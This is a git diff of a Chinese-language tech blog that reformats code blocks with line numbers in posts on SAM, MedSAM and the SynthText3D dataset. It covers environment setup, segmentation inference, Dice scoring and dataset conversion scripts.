      Returns a bounding box from a mask
      从 ground truth 中提取出边界框坐标信息,用于对图像进行裁剪
      '''
      y_indices, x_indices = np.where(mask > 0)
      x_min, x_max = np.min(x_indices), np.max(x_indices)
      y_min, y_max = np.min(y_indices), np.max(y_indices)
      # add perturbation to bounding box coordinates
      H, W = mask.shape
      x_min = max(0, x_min - np.random.randint(0, 20))
      x_max = min(W, x_max + np.random.randint(0, 20))
      y_min = max(0, y_min - np.random.randint(0, 20))
      y_max = min(H, y_max + np.random.randint(0, 20))

      return np.array([x_min, y_min, x_max, y_max])

      # 获得 ground truth
      gt_data = io.imread(join(ts_gt_path, test_names[img_idx]))
      bbox_raw = get_bbox_from_mask(gt_data)

      # preprocess: cut-off and max-min normalization 图像预处理
      lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
      image_data_pre = np.clip(image_data, lower_bound, upper_bound)
      # 亮度范围裁剪
      image_data_pre = (image_data_pre - np.min(image_data_pre))/(np.max(image_data_pre)-np.min(image_data_pre))*255.0
      image_data_pre[image_data==0] = 0
      image_data_pre = np.uint8(image_data_pre)
      H, W, _ = image_data_pre.shape

      # predict the segmentation mask using the original SAM model
      # 开跑!
      ori_sam_predictor.set_image(image_data_pre)
      ori_sam_seg, _, _ = ori_sam_predictor.predict(point_coords=None, box=bbox_raw, multimask_output=False)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      from skimage import io
      # 加载 原始 SAM 模型 到 GPU 上
      ori_sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device)
      # 加载 predictor
      ori_sam_predictor = SamPredictor(ori_sam_model)

      # 读入数据集
      ts_img_path = 'data/MedSAMDemo_2D/test/images'
      ts_gt_path = 'data/MedSAMDemo_2D/test/labels'
      test_names = sorted(os.listdir(ts_img_path))

      # random select a test case
      # 随机读取一张图像
      img_idx = np.random.randint(len(test_names)) # 获取索引
      image_data = io.imread(join(ts_img_path, test_names[img_idx])) # 读取
      if image_data.shape[-1]>3 and len(image_data.shape)==3: # 确保图像只有 3 个通道
      image_data = image_data[:,:,:3]
      if len(image_data.shape)==2: # 如果是单通道的灰度图像,转成 3 通道
      image_data = np.repeat(image_data[:,:,None], 3, axis=-1)
      # read ground truth (gt should have the same name as the image) and simulate a bounding box
      def get_bbox_from_mask(mask):
      '''
      Returns a bounding box from a mask
      从 ground truth 中提取出边界框坐标信息,用于对图像进行裁剪
      '''
      y_indices, x_indices = np.where(mask > 0)
      x_min, x_max = np.min(x_indices), np.max(x_indices)
      y_min, y_max = np.min(y_indices), np.max(y_indices)
      # add perturbation to bounding box coordinates
      H, W = mask.shape
      x_min = max(0, x_min - np.random.randint(0, 20))
      x_max = min(W, x_max + np.random.randint(0, 20))
      y_min = max(0, y_min - np.random.randint(0, 20))
      y_max = min(H, y_max + np.random.randint(0, 20))

      return np.array([x_min, y_min, x_max, y_max])

      # 获得 ground truth
      gt_data = io.imread(join(ts_gt_path, test_names[img_idx]))
      bbox_raw = get_bbox_from_mask(gt_data)

      # preprocess: cut-off and max-min normalization 图像预处理
      lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
      image_data_pre = np.clip(image_data, lower_bound, upper_bound)
      # 亮度范围裁剪
      image_data_pre = (image_data_pre - np.min(image_data_pre))/(np.max(image_data_pre)-np.min(image_data_pre))*255.0
      image_data_pre[image_data==0] = 0
      image_data_pre = np.uint8(image_data_pre)
      H, W, _ = image_data_pre.shape

      # predict the segmentation mask using the original SAM model
      # 开跑!
      ori_sam_predictor.set_image(image_data_pre)
      ori_sam_seg, _, _ = ori_sam_predictor.predict(point_coords=None, box=bbox_raw, multimask_output=False)

      predict the segmentation mask using the fine-tuned model

      -
      # resize image to 3*1024*1024
      # 使用 ResizeLongestSide() 函数对原始图像进行大小调整,将其 resize 为 3x1024x1024 的张量
      sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
      resize_img = sam_transform.apply_image(image_data_pre)
      # 将调整后的图像张量转换为 PyTorch tensor
      resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(device)
      input_image = sam_model.preprocess(resize_img_tensor[None,:,:,:]) # (1, 3, 1024, 1024)
      assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'

      with torch.no_grad():
      # pre-compute the image embedding 使用模型的 image_encoder 对象计算图像嵌入向量
      ts_img_embedding = sam_model.image_encoder(input_image)
      # convert box to 1024x1024 grid 将 box 坐标信息调整到 1024x1024 的网络 grid 上
      bbox = sam_trans.apply_boxes(bbox_raw, (H, W))
      print(f'{bbox_raw=} -> {bbox=}')
      box_torch = torch.as_tensor(bbox, dtype=torch.float, device=device)
      if len(box_torch.shape) == 2:
      box_torch = box_torch[:, None, :] # (B, 4) -> (B, 1, 4)

      # 使用 prompt_encoder 对象计算稠密和稀疏的嵌入向量(dense and sparse embedding)
      sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
      points=None,
      boxes=box_torch,
      masks=None,
      )
      medsam_seg_prob, _ = sam_model.mask_decoder( # 各种图像嵌入向量
      image_embeddings=ts_img_embedding.to(device), # (B, 256, 64, 64)
      image_pe=sam_model.prompt_encoder.get_dense_pe(), # (1, 256, 64, 64)
      sparse_prompt_embeddings=sparse_embeddings, # (B, 2, 256)
      dense_prompt_embeddings=dense_embeddings, # (B, 256, 64, 64)
      multimask_output=False,
      )
      medsam_seg_prob = torch.sigmoid(medsam_seg_prob) # 压缩到[0, 1]
      # convert soft mask to hard mask
      medsam_seg_prob = medsam_seg_prob.cpu().numpy().squeeze()
      medsam_seg = (medsam_seg_prob > 0.5).astype(np.uint8)
      print(medsam_seg.shape)
      -
      bbox_raw=array([164, 159, 189, 187], dtype=int64) -> bbox=array([[656, 636, 756, 748]], dtype=int64)
      (256, 256)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      # resize image to 3*1024*1024
      # 使用 ResizeLongestSide() 函数对原始图像进行大小调整,将其 resize 为 3x1024x1024 的张量
      sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
      resize_img = sam_transform.apply_image(image_data_pre)
      # 将调整后的图像张量转换为 PyTorch tensor
      resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(device)
      input_image = sam_model.preprocess(resize_img_tensor[None,:,:,:]) # (1, 3, 1024, 1024)
      assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'

      with torch.no_grad():
      # pre-compute the image embedding 使用模型的 image_encoder 对象计算图像嵌入向量
      ts_img_embedding = sam_model.image_encoder(input_image)
      # convert box to 1024x1024 grid 将 box 坐标信息调整到 1024x1024 的网络 grid 上
      bbox = sam_trans.apply_boxes(bbox_raw, (H, W))
      print(f'{bbox_raw=} -> {bbox=}')
      box_torch = torch.as_tensor(bbox, dtype=torch.float, device=device)
      if len(box_torch.shape) == 2:
      box_torch = box_torch[:, None, :] # (B, 4) -> (B, 1, 4)

      # 使用 prompt_encoder 对象计算稠密和稀疏的嵌入向量(dense and sparse embedding)
      sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
      points=None,
      boxes=box_torch,
      masks=None,
      )
      medsam_seg_prob, _ = sam_model.mask_decoder( # 各种图像嵌入向量
      image_embeddings=ts_img_embedding.to(device), # (B, 256, 64, 64)
      image_pe=sam_model.prompt_encoder.get_dense_pe(), # (1, 256, 64, 64)
      sparse_prompt_embeddings=sparse_embeddings, # (B, 2, 256)
      dense_prompt_embeddings=dense_embeddings, # (B, 256, 64, 64)
      multimask_output=False,
      )
      medsam_seg_prob = torch.sigmoid(medsam_seg_prob) # 压缩到[0, 1]
      # convert soft mask to hard mask
      medsam_seg_prob = medsam_seg_prob.cpu().numpy().squeeze()
      medsam_seg = (medsam_seg_prob > 0.5).astype(np.uint8)
      print(medsam_seg.shape)
      +
      1
      2
      bbox_raw=array([164, 159, 189, 187], dtype=int64) -> bbox=array([[656, 636, 756, 748]], dtype=int64)
      (256, 256)

      计算准确率

      表明我们这个操作确实牛逼!

      -
      ori_sam_dsc = compute_dice_coefficient(gt_data>0, ori_sam_seg>0)
      medsam_dsc = compute_dice_coefficient(gt_data>0, medsam_seg>0)
      print('Original SAM DSC: {:.4f}'.format(ori_sam_dsc), 'MedSAM DSC: {:.4f}'.format(medsam_dsc))
      -
      Original SAM DSC: 0.7397 MedSAM DSC: 0.9145
      +
      1
      2
      3
      ori_sam_dsc = compute_dice_coefficient(gt_data>0, ori_sam_seg>0)
      medsam_dsc = compute_dice_coefficient(gt_data>0, medsam_seg>0)
      print('Original SAM DSC: {:.4f}'.format(ori_sam_dsc), 'MedSAM DSC: {:.4f}'.format(medsam_dsc))
      +
      1
      Original SAM DSC: 0.7397 MedSAM DSC: 0.9145

      visualization functions

      -
      # visualization functions
      # source: https://github.com/facebookresearch/segment-anything/blob/main/notebooks/predictor_example.ipynb
      # change color to avoid red and green
      def show_mask(mask, ax, random_color=False):
      if random_color:
      color = np.concatenate([np.random.random(3), np.array([0.6])], axis=0)
      else:
      color = np.array([251/255, 252/255, 30/255, 0.6])
      h, w = mask.shape[-2:]
      mask_image = mask.reshape(h, w, 1) * color.reshape(1, 1, -1)
      ax.imshow(mask_image)

      def show_box(box, ax):
      x0, y0 = box[0], box[1]
      w, h = box[2] - box[0], box[3] - box[1]
      ax.add_patch(plt.Rectangle((x0, y0), w, h, edgecolor='blue', facecolor=(0,0,0,0), lw=2))

      _, axs = plt.subplots(1, 3, figsize=(25, 25))
      axs[0].imshow(image_data)
      show_mask(gt_data>0, axs[0])
      # show_box(box_np[img_id], axs[0])
      # axs[0].set_title('Mask with Tuned Model', fontsize=20)
      axs[0].axis('off')

      axs[1].imshow(image_data)
      show_mask(ori_sam_seg, axs[1])
      show_box(bbox_raw, axs[1])
      # add text to image to show dice score
      axs[1].text(0.5, 0.5, 'SAM DSC: {:.4f}'.format(ori_sam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
      # axs[1].set_title('Mask with Untuned Model', fontsize=20)
      axs[1].axis('off')

      axs[2].imshow(image_data)
      show_mask(medsam_seg, axs[2])
      show_box(bbox_raw, axs[2])
      # add text to image to show dice score
      axs[2].text(0.5, 0.5, 'MedSAM DSC: {:.4f}'.format(medsam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
      # axs[2].set_title('Ground Truth', fontsize=20)
      axs[2].axis('off')
      plt.show()
      plt.subplots_adjust(wspace=0.01, hspace=0)
      # save plot
      # plt.savefig(join(model_save_path, test_npzs[npz_idx].split('.npz')[0] + str(img_id).zfill(3) + '.png'), bbox_inches='tight', dpi=300)
      plt.close()
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      # visualization functions
      # source: https://github.com/facebookresearch/segment-anything/blob/main/notebooks/predictor_example.ipynb
      # change color to avoid red and green
      def show_mask(mask, ax, random_color=False):
      if random_color:
      color = np.concatenate([np.random.random(3), np.array([0.6])], axis=0)
      else:
      color = np.array([251/255, 252/255, 30/255, 0.6])
      h, w = mask.shape[-2:]
      mask_image = mask.reshape(h, w, 1) * color.reshape(1, 1, -1)
      ax.imshow(mask_image)

      def show_box(box, ax):
      x0, y0 = box[0], box[1]
      w, h = box[2] - box[0], box[3] - box[1]
      ax.add_patch(plt.Rectangle((x0, y0), w, h, edgecolor='blue', facecolor=(0,0,0,0), lw=2))

      _, axs = plt.subplots(1, 3, figsize=(25, 25))
      axs[0].imshow(image_data)
      show_mask(gt_data>0, axs[0])
      # show_box(box_np[img_id], axs[0])
      # axs[0].set_title('Mask with Tuned Model', fontsize=20)
      axs[0].axis('off')

      axs[1].imshow(image_data)
      show_mask(ori_sam_seg, axs[1])
      show_box(bbox_raw, axs[1])
      # add text to image to show dice score
      axs[1].text(0.5, 0.5, 'SAM DSC: {:.4f}'.format(ori_sam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
      # axs[1].set_title('Mask with Untuned Model', fontsize=20)
      axs[1].axis('off')

      axs[2].imshow(image_data)
      show_mask(medsam_seg, axs[2])
      show_box(bbox_raw, axs[2])
      # add text to image to show dice score
      axs[2].text(0.5, 0.5, 'MedSAM DSC: {:.4f}'.format(medsam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
      # axs[2].set_title('Ground Truth', fontsize=20)
      axs[2].axis('off')
      plt.show()
      plt.subplots_adjust(wspace=0.01, hspace=0)
      # save plot
      # plt.savefig(join(model_save_path, test_npzs[npz_idx].split('.npz')[0] + str(img_id).zfill(3) + '.png'), bbox_inches='tight', dpi=300)
      plt.close()

      png

      @@ -1036,6 +1034,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Segment Anything/index.html b/posts/Paper-Segment Anything/index.html index 801691906f..ef7ada4d76 100644 --- a/posts/Paper-Segment Anything/index.html +++ b/posts/Paper-Segment Anything/index.html @@ -44,8 +44,6 @@ - - @@ -506,17 +504,17 @@

      笔记

      代码

      配环境

      ​ 新建一个 conda 环境:

      -
      conda create -n segment-anything python=3.9
      +
      1
      conda create -n segment-anything python=3.9

      ​ 使用离线安装方式安装 pytorch(被坑了 n 次逐渐熟练了orz,还是离线安装的方式好使),从 download.pytorch.org/whl/torch_stable.html 下载对应版本的 pytorchtorchvision

      png

      -
      conda activate segment-anything
      +
      1
      conda activate segment-anything

      转到下载的目录下:

      -
      pip install torch-1.13.1+cu117-cp39-cp39-win_amd64.whl
      -
      pip install torchvision-0.14.1+cu117-cp39-cp39-win_amd64.whl
      +
      1
      pip install torch-1.13.1+cu117-cp39-cp39-win_amd64.whl
      +
      1
      pip install torchvision-0.14.1+cu117-cp39-cp39-win_amd64.whl

      ​ 在 facebookresearch/segment-anything: The repository provides code for running inference with the SegmentAnything Model (SAM), links for downloading the trained model checkpoints, and example notebooks that show how to use the model. (github.com) 中,把代码下载下来:

      png

      ​ 在下载下的仓库的根目录上,安装segment-anything

      -
      pip install -e .
      +
      1
      pip install -e .

      ​ 下载预训练好的模型sam_vit_h_4b8939.pthViT-H SAM model,也放到仓库根目录下:

      当然也可以选择其他模型:

        @@ -526,18 +524,18 @@

        配环境

        png

        跑!

        1. 导入相关库

        -
        import torch
        import torchvision
        print("PyTorch version:", torch.__version__)
        print("Torchvision version:", torchvision.__version__)
        print("CUDA is available:", torch.cuda.is_available())
        +
        1
        2
        3
        4
        5
        import torch
        import torchvision
        print("PyTorch version:", torch.__version__)
        print("Torchvision version:", torchvision.__version__)
        print("CUDA is available:", torch.cuda.is_available())
        PyTorch version: 1.13.1+cu117
         Torchvision version: 0.14.1+cu117
         CUDA is available: True
         
        -
        import numpy as np
        import torch
        import matplotlib.pyplot as plt
        import cv2

        import sys
        sys.path.append("..")
        from segment_anything import sam_model_registry, SamAutomaticMaskGenerator, SamPredictor

        # 防止使用 matplotlib 时内核挂掉
        import os
        os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        import numpy as np
        import torch
        import matplotlib.pyplot as plt
        import cv2

        import sys
        sys.path.append("..")
        from segment_anything import sam_model_registry, SamAutomaticMaskGenerator, SamPredictor

        # 防止使用 matplotlib 时内核挂掉
        import os
        os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"

        2. 读取待分割的图像

        -
        image = cv2.imread('images/chess.jpg')
        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
        -
        plt.figure(figsize=(10,10))
        plt.imshow(image)
        plt.axis('off')
        plt.show()
        +
        1
        2
        image = cv2.imread('images/chess.jpg')
        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
        +
        1
        2
        3
        4
        plt.figure(figsize=(10,10))
        plt.imshow(image)
        plt.axis('off')
        plt.show()

        png

        3. 载入待分割的模型

        -
        sam_checkpoint = "../sam_vit_h_4b8939.pth"
        model_type = "vit_h"

        device = "cuda"

        sam = sam_model_registry[model_type](checkpoint=sam_checkpoint)
        sam.to(device=device)

        +
        1
        2
        3
        4
        5
        6
        7
        8
        sam_checkpoint = "../sam_vit_h_4b8939.pth"
        model_type = "vit_h"

        device = "cuda"

        sam = sam_model_registry[model_type](checkpoint=sam_checkpoint)
        sam.to(device=device)

        4. 设置参数

        ​ 自动 mask 生成中有几个可调参数,用于控制采样点的密度以及去除低质量或重复 mask 的阈值。
        ​ 此外,生成可以在图像裁剪上自动运行,以提高较小对象的性能,后处理可以去除杂散像素和孔洞。以下是对更多 masks 进行采样的示例配置:https://github.com/facebookresearch/segment-anything/blob/9e1eb9fdbc4bca4cd0d948b8ae7fe505d9f4ebc7/segment_anything/automatic_mask_generator.py#L35
        @@ -588,10 +586,10 @@

        mask_generator_ = SamAutomaticMaskGenerator(
        model=sam,
        points_per_side=64,
        pred_iou_thresh=0.98,
        stability_score_thresh=0.96,
        crop_n_layers=1,
        crop_n_points_downscale_factor=2,
        min_mask_region_area=100, # Requires open-cv to run post-processing
        )
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        mask_generator_ = SamAutomaticMaskGenerator(
        model=sam,
        points_per_side=64,
        pred_iou_thresh=0.98,
        stability_score_thresh=0.96,
        crop_n_layers=1,
        crop_n_points_downscale_factor=2,
        min_mask_region_area=100, # Requires open-cv to run post-processing
        )

        4. 分割

        -
        masks = mask_generator_.generate(image)
        -
        print(len(masks))  # 输出分割出的类数
        +
        1
        masks = mask_generator_.generate(image)
        +
        1
        print(len(masks))  # 输出分割出的类数
        55
         

        ​ Mask generation 生成返回一个 list over masks,其中每个 mask 都是一个包含有关 mask 的各种数据的字典。 这些键是:

        @@ -604,8 +602,8 @@

        4. 分割

      • stability_score:mask 质量的额外衡量标准
      • crop_box:用于生成 XYWH 格式 mask 的图像裁剪
      -
      def show_anns(anns):
      if len(anns) == 0:
      return
      sorted_anns = sorted(anns, key=(lambda x: x['area']), reverse=True)
      """
      plt.gca() 是 matplotlib 库中的一个函数,其作用是获取当前图形的坐标轴对象。
      在绘制多个子图时,我们可以在调用子图方法时使用 subplot 函数来指定图的位置,
      但如果想对这些子图进行进一步的个性化设置,就需要得到每个子图的坐标轴对象。
      使用 plt.gca() 函数可以获取当前图像的Axes对象,
      我们可以通过该对象进行坐标轴范围设置、坐标轴标签设置、坐标轴刻度设置等操作。
      """
      ax = plt.gca()
      ax.set_autoscale_on(False)
      polygons = []
      color = []
      for ann in sorted_anns:
      m = ann['segmentation'] # 获取 mask
      img = np.ones((m.shape[0], m.shape[1], 3))
      color_mask = np.random.random((1, 3)).tolist()[0]
      for i in range(3): # 随机上色
      img[:,:,i] = color_mask[i]
      """
      这行代码使用 matplotlib 库中的 imshow() 函数将图像 img 和常数变量 m * 0.35 在水平方向上连接起来形成一个新的 RGB 图像,
      然后将其显示在坐标轴对象 ax 上。
      更具体地说,np.dstack((img, m * 0.35)) 调用了 numpy 库的 dstack() 函数,
      将两个具有相同形状的二维数组 img 和 m * 0.35 沿着第三个维度(深度)进行堆叠,形成一个新的三维数组。
      其中,第三个维度上的元素依次为 img 对应位置的像素值和 m * 0.35 对应位置的数字,
      因此可以看作是在原始图像的基础上加上了一层颜色偏移。
      ax.imshow() 将这个三维数组作为输入数据,利用默认的参数对图像进行处理,
      包括调整颜色映射、插值方式等等,并将其显示在指定的坐标轴对象上。
      """
      ax.imshow(np.dstack((img, m * 0.35)))
      -
      plt.figure(figsize=(10,10))
      plt.imshow(image)
      show_anns(masks)
      plt.axis('off')
      plt.show()
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      def show_anns(anns):
      if len(anns) == 0:
      return
      sorted_anns = sorted(anns, key=(lambda x: x['area']), reverse=True)
      """
      plt.gca() 是 matplotlib 库中的一个函数,其作用是获取当前图形的坐标轴对象。
      在绘制多个子图时,我们可以在调用子图方法时使用 subplot 函数来指定图的位置,
      但如果想对这些子图进行进一步的个性化设置,就需要得到每个子图的坐标轴对象。
      使用 plt.gca() 函数可以获取当前图像的Axes对象,
      我们可以通过该对象进行坐标轴范围设置、坐标轴标签设置、坐标轴刻度设置等操作。
      """
      ax = plt.gca()
      ax.set_autoscale_on(False)
      polygons = []
      color = []
      for ann in sorted_anns:
      m = ann['segmentation'] # 获取 mask
      img = np.ones((m.shape[0], m.shape[1], 3))
      color_mask = np.random.random((1, 3)).tolist()[0]
      for i in range(3): # 随机上色
      img[:,:,i] = color_mask[i]
      """
      这行代码使用 matplotlib 库中的 imshow() 函数将图像 img 和常数变量 m * 0.35 在水平方向上连接起来形成一个新的 RGB 图像,
      然后将其显示在坐标轴对象 ax 上。
      更具体地说,np.dstack((img, m * 0.35)) 调用了 numpy 库的 dstack() 函数,
      将两个具有相同形状的二维数组 img 和 m * 0.35 沿着第三个维度(深度)进行堆叠,形成一个新的三维数组。
      其中,第三个维度上的元素依次为 img 对应位置的像素值和 m * 0.35 对应位置的数字,
      因此可以看作是在原始图像的基础上加上了一层颜色偏移。
      ax.imshow() 将这个三维数组作为输入数据,利用默认的参数对图像进行处理,
      包括调整颜色映射、插值方式等等,并将其显示在指定的坐标轴对象上。
      """
      ax.imshow(np.dstack((img, m * 0.35)))
      +
      1
      2
      3
      4
      5
      plt.figure(figsize=(10,10))
      plt.imshow(image)
      show_anns(masks)
      plt.axis('off')
      plt.show()

      png

      @@ -824,6 +822,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Segment Everything Everywhere All at Once/index.html b/posts/Paper-Segment Everything Everywhere All at Once/index.html index 1d98f2893d..20fb7a0bcb 100644 --- a/posts/Paper-Segment Everything Everywhere All at Once/index.html +++ b/posts/Paper-Segment Everything Everywhere All at Once/index.html @@ -44,8 +44,6 @@ - - @@ -756,6 +754,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Shape Robust Text Detection With Progressive Scale Expansion Network/index.html b/posts/Paper-Shape Robust Text Detection With Progressive Scale Expansion Network/index.html index 60868af4dc..29e85d4c85 100644 --- a/posts/Paper-Shape Robust Text Detection With Progressive Scale Expansion Network/index.html +++ b/posts/Paper-Shape Robust Text Detection With Progressive Scale Expansion Network/index.html @@ -44,8 +44,6 @@ - - @@ -825,6 +823,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Structured Domain Randomization-Bridging the Reality Gap by Context-Aware Synthetic Data/index.html b/posts/Paper-Structured Domain Randomization-Bridging the Reality Gap by Context-Aware Synthetic Data/index.html index 6ff67e985a..4a7e392af1 100644 --- a/posts/Paper-Structured Domain Randomization-Bridging the Reality Gap by Context-Aware Synthetic Data/index.html +++ b/posts/Paper-Structured Domain Randomization-Bridging the Reality Gap by Context-Aware Synthetic Data/index.html @@ -44,8 +44,6 @@ - - @@ -697,6 +695,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-SynthTIGER-Synthetic Text Image GEneratoR Towards Better Text Recognition Models/index.html b/posts/Paper-SynthTIGER-Synthetic Text Image GEneratoR Towards Better Text Recognition Models/index.html index f2a4d273e1..a6b45e136b 100644 --- a/posts/Paper-SynthTIGER-Synthetic Text Image GEneratoR Towards Better Text Recognition Models/index.html +++ b/posts/Paper-SynthTIGER-Synthetic Text Image GEneratoR Towards Better Text Recognition Models/index.html @@ -44,8 +44,6 @@ - - @@ -880,6 +878,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/index.html b/posts/Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/index.html index aa76e959fc..237a945a50 100644 --- a/posts/Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/index.html +++ b/posts/Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/index.html @@ -44,8 +44,6 @@ - - @@ -645,15 +643,15 @@

      5. Conclusion

      ​ 总结一下完事。

      代码

      数据集可视化

      -
      import numpy as np
      import cv2
      import os
      import matplotlib.pyplot as plt

      index = 27

      image_dir = r'E:\dataset\Synth3D-10K\img\\'
      label_dir = r'E:\dataset\Synth3D-10K\label\\'

      image_path = os.path.join(image_dir, str(index) + '.jpg')
      label_path = os.path.join(label_dir, str(index) + '.txt')

      image_origin = cv2.imread(image_path)
      image = image_origin.copy()
      height, width, _ = image.shape

      with open(label_path, "r") as file:
      data = file.read()

      lines = data.split("\n") # 按行分割文本
      result = []
      for line in lines:
      if len(line) > 1:
      values = line.split(",") # 按逗号分割字符串
      result.extend([float(s) for s in values])

      x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
      y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

      for i in range(len(x_list)):
      x = x_list[i]
      y = y_list[i]
      points = np.array([x, y], np.int32).T
      cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
      for p in points:
      cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

      fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
      axes = axes.flatten()

      axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
      axes[0].axis('off')
      axes[0].set_title('Origin')

      axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
      axes[1].axis('off')
      axes[1].set_title('Annotation')

      plt.tight_layout()
      plt.show()
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      import numpy as np
      import cv2
      import os
      import matplotlib.pyplot as plt

      index = 27

      image_dir = r'E:\dataset\Synth3D-10K\img\\'
      label_dir = r'E:\dataset\Synth3D-10K\label\\'

      image_path = os.path.join(image_dir, str(index) + '.jpg')
      label_path = os.path.join(label_dir, str(index) + '.txt')

      image_origin = cv2.imread(image_path)
      image = image_origin.copy()
      height, width, _ = image.shape

      with open(label_path, "r") as file:
      data = file.read()

      lines = data.split("\n") # 按行分割文本
      result = []
      for line in lines:
      if len(line) > 1:
      values = line.split(",") # 按逗号分割字符串
      result.extend([float(s) for s in values])

      x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
      y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

      for i in range(len(x_list)):
      x = x_list[i]
      y = y_list[i]
      points = np.array([x, y], np.int32).T
      cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
      for p in points:
      cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

      fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
      axes = axes.flatten()

      axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
      axes[0].axis('off')
      axes[0].set_title('Origin')

      axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
      axes[1].axis('off')
      axes[1].set_title('Annotation')

      plt.tight_layout()
      plt.show()

      png

      ​ 但是通过人工审查,有些图像的质量实在不敢恭维,这真的好使吗?

      png

      转换成 TotalText 形式

      -
      import numpy as np
      import os
      from tqdm import tqdm

      label_dir = r'E:\dataset\Synth3D-10K\label'
      save_dir = r"E:\dataset\Synth3D-10K\Txts"

      for index in tqdm(range(1, 10000 + 1)):
      label_path = os.path.join(label_dir, str(index) + '.txt')

      with open(label_path, "r") as file:
      data = file.read()

      lines = data.split("\n") # 按行分割文本
      result = []
      for line in lines:
      if len(line) > 1:
      values = line.split(",") # 按逗号分割字符串
      result.extend([float(s) for s in values])

      x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
      y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

      string = ""

      for i in range(len(x_list)):
      x = x_list[i]
      y = y_list[i]
      points = np.array([x, y], np.int32).T

      string += 'x: [['
      string += ' '.join(map(str, x))
      string += ']], y: [['
      string += ' '.join(map(str, y))
      string += "]], ornt: [u'h"
      string += "'], transcriptions: [u'"
      string += "#"
      string += "']\n"
      with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
      file.write(string)
      -
      import os
      from tqdm import tqdm

      file_dir = r"E:\dataset\Synth3D-10K\Images\\"

      for file in tqdm(os.listdir(file_dir)):
      os.rename(os.path.join(file_dir, file), os.path.join(file_dir, "img" + file))
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      import numpy as np
      import os
      from tqdm import tqdm

      label_dir = r'E:\dataset\Synth3D-10K\label'
